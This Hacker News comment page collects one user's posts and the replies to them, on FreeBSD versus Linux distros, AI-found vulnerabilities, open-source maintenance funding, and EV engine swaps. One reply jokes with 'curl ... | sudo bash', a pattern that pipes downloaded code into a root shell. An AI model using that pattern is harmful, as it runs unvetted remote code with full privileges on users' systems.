Hacker News .hnnew | past | comments | ask | show | jobs | submit | tclancy's commentslogin

It's ok, I don't read that fast.

Good to know. I had been teetering on picking this stuff up for a month or so. Now that I know it is yet another tech nerd thing that has an Us vs Them zealotry (or Pepsi Taste Loyalty Test), I'm sold. If I profile as iPhone, Playstation, ReplayTV over TiVo, Sega over NES, C64, videodisc over cassette (I blame my dad for that) which side should I choose? Does either one have better quality zealots (I want to be on the other side)?

There’s always a guy. It’s great that your favorite distro is definitely safer. An order of magnitude fewer exploits will mean only a few thousand or so, I suppose. Ozymandis used Gentoo.

Calling FreeBSD "just a distro" is verging on insulting. It's an operating system.

Apologies, "OS". I am not a native speaker of whatever place that considers these fightin' words.

Distros are operating systems.

Well, as they're a FreeBSD dev, I would be surprised if they pointed anyone in a different direction.

FreeBSD is not a distro. It's not even Linux; it's a completely different kernel and operating system that traces back to even before Linux. It's honestly closer to Darwin than it is to Linux; macOS is technically a BSD. (Not FreeBSD though.)

Darwin is its own thing really. There are parts from BSD, there are also parts from Mach and there are also unique parts.

Of course. Linux does not share any heritage with BSD though.

Except that they are both based on Unix and (generally) made to run on x86 processors. Which is a pretty big similarity

FreeBSD is not a distro

What does the D in BSD stand for again?

That's more of a historical artifact. The BSDs started as just "BSD": a set of patches for AT&T Unix that were _distributed_ by Berkeley. Eventually the patches became complete enough to be an entire operating system. _Then_ the various BSDs that we know today (FreeBSD, OpenBSD, NetBSD, DragonflyBSD) all forked and became completely independent operating systems. For decades, FreeBSD's kernel and userland has been developed independently from the OpenBSD kernel and userland which is developed independently from NetBSD's kernel and userland, etc. You could not take an OpenBSD program and run it on FreeBSD. Even recompilation from source isn't necessarily enough since the BSDs support different syscalls.

They are completely independent operating systems with a distant shared history.

Whereas on Linux, the distros are taking a common Linux kernel source, and combining it with their choice of common userlands like GNU. Debian has the same kernel and GNU userland that Arch and Fedora use. You could take a program compiled for Debian and run it on Arch, which is common these days due to Docker where you're pulling another distro's userland and running it on your distro's kernel. That is how Linux distros are "distros" whereas the BSDs are independent operating systems.


Distribution. Which is a different word than distro, with a different meaning. Like smart and smartass.

While you’re correct that FreeBSD is not a Linux distribution, the word “distro” is literally short for distribution. It doesn’t have a different meaning like smart and smartass, it’s more like repo and repository.

Distribution. But it’s not a Linux distribution.

So, to play Pandora, what if the net effect of uncovering all these unknown attack vectors is it actually empties the holsters of every national intelligence service around the world? Just an idea I have been playing with. Say it basically cleans up everything and everyone looking for exploits has to start from scratch except “scratch” is now a place where any useful piece of software has been fuzz tested, property tested and formally verified.

Assuming we survive the gap period where every country chucks what they still have at their worst enemies, I mean. I suppose we can always hit each other with animal bones.


TBH this is a pretty good way of looking at it. Yeah we're seeing an explosion of vulnerabilities being found right now, but that (hopefully) means those vulnerabilities are all being cleaned up and we're entering a more hardened era of software. Minus the software packages that are being intentionally put out as exploits, of course. Maybe some might say it's too optimistic and naive, but I think you have a good point.

I agree with the prediction but not the timing. We won't enter a more hardened era of software until after a long period of security vulnerabilities.

Rivers caught on fire for a hundred years before the EPA was formed.


New code will also use these tools from the get go, hopefully vastly reducing the vulnerabilities that make it to prod to begin with.

The future may be distributed quite unevenly here, as they say, with a divergence between a small amount of "responsible" code in systems which leverage AI defensively, and a larger amount of vibe-coded / prompt-engineered code in systems which don't go through the extra trouble, and in fact create additional risk by cutting corners on human review. I personally know a lot of people using AI to create software faster, but none of them have created special security harnesses a la Mozilla (https://arstechnica.com/information-technology/2026/05/mozil...).

> we're entering a more hardened era of software

This is one force that operates. Another is that, in an effort to avoid depending on such a big attack surface, people are increasingly rolling their own code (with or without AI help) where they might previously have turned to an open source library.

I think the effect will generally be an increase in vulnerabilities, since the hand-rolled code hasn't had the same amount of time soaking in the real world as the equivalent OS library; there's no reason to assume the average author would magically create fewer bugs than the original OS library authors initially did. But the vulnerabilities will have much narrower scope: If you successfully exploit an OS library, you can hack a large fraction of all the code that uses it, while if you successfully exploit FooCorp's hand-rolled implementation, you can only hack FooCorp. This changes the economic incentive of funding vulnerabilities to exploit -- though less now than in the past, when you couldn't just point an LLM at your target and tell it "plz hack".


If I hand roll my logging library, I unlikely include automatic LDAP request based on message text (infamous Log4j vulnerability).

I’m seeing a lot of similar things during code reviews of substantially LLM-produced codebases now. Half-baked bad idea that probably leaked from training sets.

It would be very helpful to see even just one example of this syndrome posted so others could become better informed.

That particular vulnerability, sure, but there's lots of ways to make mistakes.

While agreeing, it also changes the mathematics of it: if a bad actor wants to hack me specifically now they have to write custom code that targets my software after figuring out what it _is_. This swaps the asymmetry around: instead of one bad actor writing an exploit for all the world (and those exploits being even harder to find), you have to hate me specifically.

Admittedly, not hard to do, but it could save some other folks.


Depends how cheap running llms against your software becomes in the future.

Typically when hand-rolling code you implement only what you require for your use-case, while a library will be more general purpose. As a consequence of doing more, have more code and more bugs.

Also, even seemingly trivial libraries can have bugs. The infamous leftpad library didn't handle certain edge doses properly.

For supply chain security and bug count, I'll take a focused custom implementation of specific features over a library full of generalized functionality.


leftpad was a focused custom implementation of a specific feature, instead of a library full of generalized functionality. At the time it was pulled, the leftpad code (JavaScript, Node, NPM) was:

    module.exports = leftpad;
    
    function leftpad (str, len, ch) {
      str = String(str);
    
      var i = -1;
    
      ch || (ch = ' ');
      len = len - str.length;
    
    
      while (++i < len) {
        str = ch + str;
      }
    
      return str;
    }
A newer version was: https://github.com/left-pad/left-pad/blob/master/index.js which cached common cases and improved on the loop performance, before String.prototype.padStart() became a thing https://www.npmjs.com/package/string.prototype.padstart

Both old and new versions return a string longer than `len` if the padding char is multiple characters, e.g. leftpad('a', 3, '&&&&') will be longer than 3. That feels like it shouldn't happen.


That's almost the first literal exercise with strings you'll learn with "The C prog lang 2nd ed" ebook. One of the most trivial cases among writting a word/space/tabs counting program (wc under Unix).

I realize I may have made it seem like I was saying leftpad was a general-purpose library. My aside about it was to note that even widely used libraries can still have bugs. That’s orthogonal to their scope.

Yes, a lot hinges on how little you can get away with implementing for your use case. If you have an XML config file with 3 settings in it, you probably won't need to implement handling of external entities the way a full XML parsing library would, which will close off an entire class of attendant vulnerabilities.

> Also, even seemingly trivial libraries can have bugs. The infamous leftpad library didn't handle certain edge doses properly.

This isn't really an argument in favour of having the average programmer reimplement stuff, though. For it to be, you'd have to argue that the leftpad author was unusually sloppy. That may be true in this specific case, but in general, I'm not persuaded that the average OSS author is worse than the average programmer overall. IMHO, contributing your work to an OSS ecosystem is already a mild signal of competence.

On the wider topic of reimplementation: Recently there was an article here about how the latest Ubuntu includes a bunch of coreutils binaries that have been rewritten in Rust. It turns out that, while this presumably reduced the number of memory corruption bugs (there was still one, somehow; I didn't dig into it), it introduced a bunch of new vulnerabilities, mostly caused by creating race conditions between checking a filesystem path and using the path for something.


This argument goes even further. If you have only 3 settings, why does it need to be an xml file?

ETA: I'm not saying it has to, I'm saying it's possible to imagine reasons that would justify this decision in some cases.

Because it might grow in future and you want to allow flexibility for that, because it might be the input to or output from some external system that requires XML, because your team might have standardised on always using XML config files, because introducing yet another custom plain text file format just creates unnecessary cognitive load for everyone who has to use it are real-world reasons I can think of.

But really I was just looking for a concrete example where I know the complexity of the implementation has definitely caused vulnerabilities, whether or not the choice to use it to solve the problem at hand was sensible. I have zero love for XML.


I’m not aware of any memory corruption bugs, but some weird cases where Linux, stuck with legacy 8-bit character handling for filenames and paths, lead to unesirable behavior with Rust’s native Unicode strings.

The race conditions were indeed TOCTOU bugs. In a sense, the bugs were a result of incorrectly handling shared mutable data, though in this case the mutations were external to Rust.

https://corrode.dev/blog/bugs-rust-wont-catch/


>there's no reason to assume the average author would magically create fewer bugs than the original OS library authors initially did

Have you read this old code? It's terrible and written with no care at all to security often in C. AI is much much better at writing code.


Do you have a specific library in mind? I think it would have to be an ancient, unmaintained C library.

But I think most OSS code isn't like this -- even C code born long ago, if it's still in wide use, has been hardened by now. Examples: Linux kernel, GNU userland, PostgreSQL, Python.


> even C code born long ago, if it's still in wide use, has been hardened by now. Examples: Linux kernel

There have been two LPE vulnerability and exploits in the Linux kernel announced today. After the one announced just last week. I don't think as much of the C code born long ago has been as carefully hardened as you think.

(Copy Fail 2 and Dirty Frag today, and Copy Fail last week)


One. "Copy Fail 2" and "Dirty Frag" are the same thing.

And consideing the size of the kenel, I call this stupendously good.

You (anyone, not you personally) write that much code yourself and let's see how well you did in comparison.


But that's the attacker advantage. You can do things right a billion times and one mistake will still take you down.

Sure, I didn't mean to say that these examples are guaranteed 100% safe -- just that I trust them to be enormously more safe than software that accomplishes the same task that was hand-written by either a human or an an LLM last week.

To be fair, to some extent that’s up to us. Time to get cleaning, I guess.

You are avoiding intentionally to say ‘thanks to LLMs’ or is implicit? As all these recent mega bugs surface with lots of fuzzing and agentic bashing, right ?

Thank you for reminding us all that you AI bros are still the most obnoxious people there are.

Indeed, yet another proof, there's the part of HN crowd which is passive aggressive, dismissive, and dishonest in the very scientific possible sense. Won't make my day harder than it is, but is a very weak signal.

If I'm to be offended by a single thing in your post that is calling me (names) - is AI Bro. This was undeserved, and cannot be farther from the truth. Not to miss the fact your comment is entirely off topic, and perhaps you see AI bros everywhere now.


This seems like a very emotional response, which is off-topic for HN. Consider using facts and logic to make calm, rational arguments.

Faults are injected into the code at a constant rate per developer. Then there's the intentional injections.

Auto-installing random software is the problem. It was a problem when our parents did it, why would it be a good idea for developers to do it?


This is related to a massive annoyance of mine: when I run a piece of software and the system is missing a required dependency, I want the software to *tell me* that dependency is missing so I can make a decision about proceeding or not. Instead it seems that far too often software authors will try and be “clever” by silently installing a bunch of dependencies, either in some directory path specific to the software, or even worse globally.

I run a distro that often causes software like this to break because their silent automatic installation typically makes assumptions about Linux systems which don’t apply to mine. However I fear for the many users of most typical distros (and other OS’ in general as it’s not just a Linux-only issue) who are subject to having all sorts of stuff foisted onto their system with little to no opportunity to easily decide what is being heaped upon them.


Ruby gems and CPAN have build scripts that rebuild stuff on the user's device (and warn you if they can't find a dependency). But I believe one of the Python's tools that started the trend of downloading binaries instead of building them. Or was it NPM?

Python's pip predates npm, installs dependencies automatically, and the old-style packages could run arbitrary code during the install.

Ruby gems are older than that, but I have no idea what capabilities it has/had.


Is it really a constant rate? Or is it a Law of Large Numbers kind of thing, where past a certain scale the randomness gets smoothed out and looks constant? Or something else?

(Obviously some developers are better or worse than others, so I presume your observation is assuming developer skill as a constant.)


curl ... | sudo bash

yolo!


New software is being generated faster than it can be adequately tested. We are in the same place we’ve always been; except everything is moving much too fast.

This is exactly the feeling I have. First: excessive growth of dependencies fueled by free components.

* with internet access to FOSS via sourceforge and github we got an abundance of building blocks

* with central repositories like CPAN, npm, pip, cargo and docker those building blocks became trivially easy to use

Then LLMs and agents added velocity to building apps and producing yet more components, feeding back into the dependency chain. Worse: new code with unattributed reuse of questionable patterns found in unknowable versions of existing libraries. That is, implicit dependencies on fragments multitude of packages.

This may all end well ultimately, but we're definitely in for a bumpy ride.


I'm somehow reminded of Wile E Coyoto running off a ledge, staying afloat until he realizes there is no more ground under his feet.

Here's a crazy idea -- what if some of these vulnerabilities are surfacing because they have actually been found, already, and exist in the training data?

Even an intelligence agency doesn't have perfect opsec, and something could get mentioned offhand somewhere on a forum, but never get picked up until the LLM uses it.


I think it will be an arms race in the future as well. Easier to fix known vulnerabilities automatically, but also easier to find new ones and the occasionally AI fuckup instead of the occasionally human fuckup.

Yeah.

Right now it kinda feels to me like "Open Source" is the Russian army, assuming their sheer numbers and their huge quantity of equipment much off which is decades old.

Meanwhile attackers and bug hunters are like the Ukrainians, using new, inexpensive, and surprisingly powerful tools that none of the Open Source community has ever seen in the past, and for which it has very little defence capability.

The attackers with cheap drones or LLMs are completely overwhelming the old school who perhaps didn't notice how quickly the world has changed around them, or did notice but cannot do anything about quickly enough.


Well this argument was certainly inventive. What a weird impression to have about these things.

Who exactly is the innocent little Ukraine supposed to be that the big bad open source is supposed to be attacking to, what? take their land and make the OSS leader look powerful and successful at acheiving goals to distract from their fundamental awfulness? And who are the North Korean canon fodder purchased by OSS while we're at it?

Yeah it's just like that, practically the same situation. The authors of gnu cp and ls can't wait to get, idk, something apparently, out of the war they started when they attacked, idk, someone apparently.


This assumes that there are no new exploits being generated.

We're seeing maintainers retreat from maintaining because the amount of AI slop being pushed at them is too much. How many are just going to hand over the maintenance burden to someone else, and how many of those new maintainers are going to be evil?

The essential problem is that our entire system of developing civilisation-critical software depends on the goodwill of a limited set of people to work for free and publish their work for everyone else to use. This was never sustainable, or even sensible, but because it was easy we based everything on it.

We need to solve the underlying problem: how to sustainably develop and maintain the software we need.

A large part of this is going to have to be: companies that use software to generate profits paying part of those profits towards the development and maintenance of that software. It just can't work any other way. How we do this is an open question that I have no answers for.


That is already how it works. The loner hacker in moms basement working for free on his super critical OSS package is largely a myth. The vast majority of OSS code is contributed by companies paying their employees to work on it.

I'm thinking of projects like curl [0]

this is a cornerstone of modern software development. If it died, or if got taken over by a malicious entity, every single company on the planet would have an immediate security problem. Yet the experience of that maintainer is bad verging on terrible [1].

We need to do better than this.

[0] https://curl.se/docs/governance.html

[1] https://lwn.net/Articles/1034966/


>As an example, he put up a slide listing the 47 car brands that use curl in their products; he followed it with a slide listing the brands that contribute to curl. The second slide, needless to say, was empty.

>He emphasized that he has released curl under a free license, so there is no legal problem with what these companies are doing. But, he suggested, these companies might want to think a bit more about the future of the software they depend on.

There is little reason for minimal-restriction licenses to exist other than to allow corporate use without compensation or contribution. I would think by now that any hope that they would voluntarily be any less exploitative than they can would have been dashed.

If you aren't getting paid or working purely for your own benefit, use a protective license. Though, if thinly veiled license violation via LLM is allowed to stand, this won't be enough.


There is a lot of opposition in the FOSS community for restrictive/protective licenses. And to be fair, this comes from a consistent and entirely logical worldview.

There's a bunch of problems with getting companies to pay for this, too - that sense of entitlement (or even contractual obligation), the ability to control the project with cash, etc.

I don't have any answers or solutions. But I don't think we can hand-wave the problem away.


The problem is that they get away too easily with bugs in their products they ship to customers. If this would come with some penalties, there would be some incentive to invest in security and this would probably often flow back to upstream projects.

Seriously? You think that curl gets away with bugs shipping to prod? And that's the major problem?

I don't agree with any of that.


I was not talking about curl, but the downstream products such as cars. And I am sure curl would appreciate support from car vendors, this was the point wasn't it?

Like a money-back guarantee?

Like you get when you buy e.g. MS products?

/s


I am not talking about the open-source projects, but the downstream products such as cars that integrate curl.

The sad truth about open source in 2026 is that it does not serve the society the way it is advertised or did back in the 90s.

How so? We have open source operating systems running on a whole sleuth of systems ages apart. Interesting ideas and open collaboration coming out of the OS world.

This opposed to closed off “products” that change at the whims of the company owning it.


Statistically. Most of it is created to serve marketing, personal or other agenda needs and is sponsored through the corresponding means for it.

There’s a lot of misconception about how the open source comes to be and very small part, still significant of course, of it was really created for the benefit of a community. There are exceptions, but dig the organisational culture and origins and you’ll see the pattern. Also, thousands of projects are made for the satisfaction of the author himself being highly intelligent and high on algorithmic dopamine.


There is an xkcd about that i think

obviously ;)

Having casually read into a few recent incidents the vector has often been outside of software. A lot of mis-configurations or simply attacking the human in the chain. And nation states have basically unbounded resources for everything from bribes, insiders, and even standing up entire companies.

Will need those animal bones if all the industrial control systems get turned against us

Nuclear might be airgapped but what about water, power…?


What we are seeing so far come out of the AI agent era is reduced not increased code quality. The few advances are by far negated by all the slop that's thrown around and that's unlikely to change.

> any useful piece of software has been fuzz tested, property tested and formally verified.

That would require effort. Human effort and extra token cost. Not going to happen, people want to rather move fast an break things.


Isn't blaming AI for that similar to blaming C for buffer overflows?

More people are producing more code because of easier tools. Most code is bad. But that's not the tools fault.

And in the end it is a problem of processes and culture.


We are not in disagreement here. I'm not blaming AI, I'm blaming the culture around its use.

>What we are seeing so far come out of the AI agent era is reduced not increased code quality.

I am not disagreeing in the main, but I wonder about the net effect. Again, this is total speculation on my part. If I vibe-slop a half dozen apps this week (and I might, just you watch), the overall raw code quality in the universe got worse. But if in the space of the same time, two major security holes got patched (assume there was no net amount of code changed), didn't things actually get better?


I didn’t have any context, so I went shopping and it looks like you’re right https://www.gmperformancemotor.com/category/ENG.html

Which is a bit wild to me because I looked into adding a supercharger to my 2010 Camaro last month and it was 7-9k DIY.


First thought was this should make for some fun resto-mods.

If I had infinite time and money, I would do this to a DeLorean.

Where is your sense of adventure? If you do it to a DeLorean, you might wind up with infinite time. Plus, pretty much every local car show I've been to has a handful of DeLoreans that I'd assume the owners are probably over maintaining. Actually, scratch that, let's go into a 3D printing business for DeLorean replacement parts to get the money thing down.

Many DeLorean parts - famously excluding the left fender - are still available as NOS from the company that bought John DeLorean's factory.

In fact, there are still complete, servicable engines _and chassis_ available. And the chassis are already registered with a VIN, so when built can be sold as a new 1984 model year vehicle.


Just to be clear, you really stomped on my Back to the Future joke, weak as it was.

Great Scott! This is heavy. If we go back 60 minutes, maybe your joke still lands.

Curious what's the issue with the left fender

Probably a frequently damaged part, it's the part that will be hit first if you pull out into the path of another car.

If I remember correctly, it was the next part to be manufactured en mass before the factory shut down. They'd do a few days of X part, another few days of Y part, etc, in rotation. Another part of the factory was assembling the complete vehicles from the parts in stock.

There's a video series on youtube about a guy that did just that. He bought a Chevy Bolt and swapped everything over:

https://www.youtube.com/watch?v=aVaQtd0LQRI


Electric motors don’t have torque curves. It’s all available right away. As a kid I remember reading in Wired about an electric car scene in California where they had to learn things the hard way and one guy’s maiden voyage ended still in his driveway with the backend split in two.

This is essentially the "area under the curve" argument. But it's been polluted to absurdum by Internet fanboys with an agenda so now everyone thinks EVs are some magical thing that don't abide by the laws of physics.

No amount of fanboy screeching is going to change the fact that it's only 200hp. Compared to a bone stock 70s/80s car that made 200-250hp from the factory this will 200hp EV will be a riot. But at $20k that's not what it's being compared against. The 500+HP LS crate motor and transmission combo (i.e. what this is being cross shopped against) are going to make more than that from ~2500rpm on up.

If you graph power available at a given output RPM with an electric motor you get a line. With an ICE you get an upward and then tapering off curve. When you add transmission gears to the ICE it's a series of essentially overlapping saw teeth except on the first gear where it goes all the way down to whatever power you make at 1500-2000rpm (so like a little under 100hp for a ~500hp engine, probably like 30hp for an ICE that makes ~200hp stock).

Basically even with a flat curve there comes a point where the taller curve is so much taller it still wins.

When comparing to cars of about the same horsepower the EVis gonna win every time, because flat curve. Even if comparing to a more powerful ICE car where the areas are approx. equal you don't have to pull back to shift (even CVTs "shift", it's for longevity reasons) and the ICE is probably not geared deep enough for best initial acceleration (though for "modern" power levels both cars have more than enough to roast the tires) the EV is still probably better.

And as an side I think it's dumb that they make you replace the transmission. There are tons and tons and tons of cars out there that either still have the original transmission or someone swapped an SBC into them in 19-whatever. Being able to just replace the engine would make the swap a ton more accessible because you don't have to also add transmission mounting, controls, driveshaft, etc. to the list. Most older transmissions can handle "muh EV torque" just fine. It's the shifting under torque they don't like.

Basically this is cool but I think it's too expensive for the specs it has.

Edit: Not calling you a stupid fanboy, just saying you've been mislead by them.


There will be torque multiplication by the transmission in 1st through 2nd so it won't be as much of a dog as you think. Race car, no. But it'll hold it's own in modern traffic unlike a lot of older cars.

Out of curiosity I looked up the ratios for the mentioned 4L60 transmission: 1st is 3.059:1, 2nd is 1.625:1, 3rd is direct drive at 1.00:1 and 4th is overdrive at 0.696:1. Then you'll have the ratio in your rear differential, whatever that happens to be.

My high school car was a 1975 Impala with the 350 cubic inch small block V8. Because of the Malaise Era emissions laws, it only produced 145hp but still had decent torque at 250ft·lb. It had a huge amount of space under the hood so perhaps this could fit both the motor and battery in there? (F/R weight balance being ignored)

Your point about people comparing this against the LS crate motor is correct IMO. This will be an expensive low-volume kit until (if!) economies of scale kick in. Only bought by people who want something different to show off to their friends at the weekend car shows.


> hold it's own in modern traffic

A 90HP Volkswagen will do that. Nobody needs 200HP to keep up with traffic.


The people who drive performance cars do. I never had a problem in my old Geo metro making 50hp - except when following a corvette - they always waiting until the end to accelerate and I needed the whole ramp to get up to speed. It works for them because they had enough power for that trick.

People get worse at merging when they have more power on tap. Saw it in my own household.

50hp per ~1000lb is just about the minimmum it if you want to hold highway speed on inclines

Being conparable to the original performance might be a feature on it's own.

Insurance companies don't care what mods you do to your car, even EV swapping, except performance mods. If you tell them you've been doing performance mods, they'll drop you.


In Europe maybe. In the US they just don't cover those parts or value.

> Edit: Not calling you a stupid fanboy, just saying you've been mislead by them.

No worries at all and I should have been clearer that I wasn't saying it was just as good, more that it wasn't "Oh well, 200hp" like a ICE engine. I also think raw horsepower is overrated in street driving. As a single data point, a couple of weeks ago I got to run three laps in a GTR "Godzilla" at Loudon on the interior track. It was a blast but after I'd come down off the high I realized that 585hp did not feel wildly different from the ~400hp in my Camaro. And I rarely get to use much of that (other than some of those lovely overly long onramps around here).


As somebody who used to race FB RX-7s and NA Miata, I can say with complete certainty that somewhere north of 120rwhp would have been nice. 200 in either car would have been a hoot, especially with the EV flat power curve. And in neither would I have wanted more than ~300hp because I have no need to go more than 150mph surrounded by other amateur car nerds. I gave up instructing because cars are just too darn fast - when I started, Miata and Rabbits and Civics were the norm, then came the E36 and E42 M3s, and then boost buggies, and then the C6, and NOPE NOPE NOPE I have a wife a mortgage don't need this anymore.

Ha, my next-door neighbor spent COVID rebuilding his CTS-V engine and the next time he went to a track day they told him he had to wear a flame-retardant suit from now on because he broke 10 seconds over whatever the standard time/distance is.

Doesn't the GT-R usually weigh significantly more than a Camaro?

No. I double-checked because I was going to be stunned if something could be heavier without having gravitational pull and they're pretty close.

- GT-R (R35, 2009–2025) generally ranges between 3,700 lbs and 3,950 lbs (approx. 1,680–1,790 kg)

- 2010 Chevrolet Camaro curb weight ranges from approximately 3,719 to 3,913 pounds (1,687–1,775 kg)

I will say that must make Godzilla denser.


Oh he has those too. According to the article, his are comically oversized, even for the genre. Because of course they are. The poor dude just screams I WANT TO BELONG in a way the other children find repellent. Other than bullies who know the value of a useful fool. Weird.

A. it shows you what deep thinkers the whole place is regardless of the person in charge right now (who is incredibly odious)

B. Of course _you_ would say that.


Did you arrive late? Could be you actually survived a purge.

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: